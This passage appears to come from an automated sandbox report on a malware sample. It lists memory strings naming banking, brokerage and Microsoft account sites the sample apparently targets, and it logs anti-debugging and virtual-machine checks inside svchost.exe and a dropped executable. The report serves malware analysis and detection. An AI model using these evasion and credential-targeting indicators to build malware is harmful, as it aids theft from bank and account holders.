                    Source: firefox.exe, 00000014.00000002.2199578147.0000012F04EFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: w2-0G0-7.15.drBinary or memory string: global block list test formVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: w2-0G0-7.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: w2-0G0-7.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: w2-0G0-7.15.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: w2-0G0-7.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: w2-0G0-7.15.drBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: w2-0G0-7.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: w2-0G0-7.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: w2-0G0-7.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: w2-0G0-7.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeAPI call chain: ExitProcess graph end nodegraph_5-104295
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337096E rdtsc 9_2_0337096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417713 LdrLoadDll,9_2_00417713
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C63F09 BlockInput,5_2_00C63F09
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BF3B3A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C25A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00C25A7C
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF4B37 LoadLibraryA,GetProcAddress,5_2_00BF4B37
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_02283500 mov eax, dword ptr fs:[00000030h]5_2_02283500
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_02283560 mov eax, dword ptr fs:[00000030h]5_2_02283560
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_02281EA0 mov eax, dword ptr fs:[00000030h]5_2_02281EA0
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_02EA3560 mov eax, dword ptr fs:[00000030h]7_2_02EA3560
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_02EA3500 mov eax, dword ptr fs:[00000030h]7_2_02EA3500
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_02EA1EA0 mov eax, dword ptr fs:[00000030h]7_2_02EA1EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340634F mov eax, dword ptr fs:[00000030h]9_2_0340634F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C310 mov ecx, dword ptr fs:[00000030h]9_2_0332C310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03350310 mov ecx, dword ptr fs:[00000030h]9_2_03350310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A30B mov eax, dword ptr fs:[00000030h]9_2_0336A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A30B mov eax, dword ptr fs:[00000030h]9_2_0336A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A30B mov eax, dword ptr fs:[00000030h]9_2_0336A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D437C mov eax, dword ptr fs:[00000030h]9_2_033D437C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03408324 mov eax, dword ptr fs:[00000030h]9_2_03408324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03408324 mov ecx, dword ptr fs:[00000030h]9_2_03408324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03408324 mov eax, dword ptr fs:[00000030h]9_2_03408324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03408324 mov eax, dword ptr fs:[00000030h]9_2_03408324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov eax, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov eax, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov eax, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov ecx, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov eax, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B035C mov eax, dword ptr fs:[00000030h]9_2_033B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FA352 mov eax, dword ptr fs:[00000030h]9_2_033FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D8350 mov ecx, dword ptr fs:[00000030h]9_2_033D8350
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h]9_2_033B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328397 mov eax, dword ptr fs:[00000030h]9_2_03328397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328397 mov eax, dword ptr fs:[00000030h]9_2_03328397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328397 mov eax, dword ptr fs:[00000030h]9_2_03328397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E388 mov eax, dword ptr fs:[00000030h]9_2_0332E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E388 mov eax, dword ptr fs:[00000030h]9_2_0332E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E388 mov eax, dword ptr fs:[00000030h]9_2_0332E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335438F mov eax, dword ptr fs:[00000030h]9_2_0335438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335438F mov eax, dword ptr fs:[00000030h]9_2_0335438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E3F0 mov eax, dword ptr fs:[00000030h]9_2_0334E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E3F0 mov eax, dword ptr fs:[00000030h]9_2_0334E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E3F0 mov eax, dword ptr fs:[00000030h]9_2_0334E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033663FF mov eax, dword ptr fs:[00000030h]9_2_033663FF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h]9_2_033403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE3DB mov eax, dword ptr fs:[00000030h]9_2_033DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE3DB mov eax, dword ptr fs:[00000030h]9_2_033DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE3DB mov ecx, dword ptr fs:[00000030h]9_2_033DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE3DB mov eax, dword ptr fs:[00000030h]9_2_033DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D43D4 mov eax, dword ptr fs:[00000030h]9_2_033D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D43D4 mov eax, dword ptr fs:[00000030h]9_2_033D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EC3CD mov eax, dword ptr fs:[00000030h]9_2_033EC3CD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B63C0 mov eax, dword ptr fs:[00000030h]9_2_033B63C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332823B mov eax, dword ptr fs:[00000030h]9_2_0332823B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340625D mov eax, dword ptr fs:[00000030h]9_2_0340625D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332826B mov eax, dword ptr fs:[00000030h]9_2_0332826B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A250 mov eax, dword ptr fs:[00000030h]9_2_0332A250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336259 mov eax, dword ptr fs:[00000030h]9_2_03336259
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA250 mov eax, dword ptr fs:[00000030h]9_2_033EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA250 mov eax, dword ptr fs:[00000030h]9_2_033EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B8243 mov eax, dword ptr fs:[00000030h]9_2_033B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B8243 mov ecx, dword ptr fs:[00000030h]9_2_033B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402A0 mov eax, dword ptr fs:[00000030h]9_2_033402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402A0 mov eax, dword ptr fs:[00000030h]9_2_033402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034062D6 mov eax, dword ptr fs:[00000030h]9_2_034062D6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov ecx, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E284 mov eax, dword ptr fs:[00000030h]9_2_0336E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E284 mov eax, dword ptr fs:[00000030h]9_2_0336E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360124 mov eax, dword ptr fs:[00000030h]9_2_03360124
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404164 mov eax, dword ptr fs:[00000030h]9_2_03404164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404164 mov eax, dword ptr fs:[00000030h]9_2_03404164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov ecx, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F0115 mov eax, dword ptr fs:[00000030h]9_2_033F0115
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C156 mov eax, dword ptr fs:[00000030h]9_2_0332C156
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C8158 mov eax, dword ptr fs:[00000030h]9_2_033C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336154 mov eax, dword ptr fs:[00000030h]9_2_03336154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336154 mov eax, dword ptr fs:[00000030h]9_2_03336154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov ecx, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034061E5 mov eax, dword ptr fs:[00000030h]9_2_034061E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03370185 mov eax, dword ptr fs:[00000030h]9_2_03370185
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EC188 mov eax, dword ptr fs:[00000030h]9_2_033EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EC188 mov eax, dword ptr fs:[00000030h]9_2_033EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4180 mov eax, dword ptr fs:[00000030h]9_2_033D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4180 mov eax, dword ptr fs:[00000030h]9_2_033D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033601F8 mov eax, dword ptr fs:[00000030h]9_2_033601F8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F61C3 mov eax, dword ptr fs:[00000030h]9_2_033F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F61C3 mov eax, dword ptr fs:[00000030h]9_2_033F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C6030 mov eax, dword ptr fs:[00000030h]9_2_033C6030
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A020 mov eax, dword ptr fs:[00000030h]9_2_0332A020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C020 mov eax, dword ptr fs:[00000030h]9_2_0332C020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4000 mov ecx, dword ptr fs:[00000030h]9_2_033B4000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335C073 mov eax, dword ptr fs:[00000030h]9_2_0335C073
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332050 mov eax, dword ptr fs:[00000030h]9_2_03332050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6050 mov eax, dword ptr fs:[00000030h]9_2_033B6050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F60B8 mov eax, dword ptr fs:[00000030h]9_2_033F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F60B8 mov ecx, dword ptr fs:[00000030h]9_2_033F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033280A0 mov eax, dword ptr fs:[00000030h]9_2_033280A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C80A8 mov eax, dword ptr fs:[00000030h]9_2_033C80A8
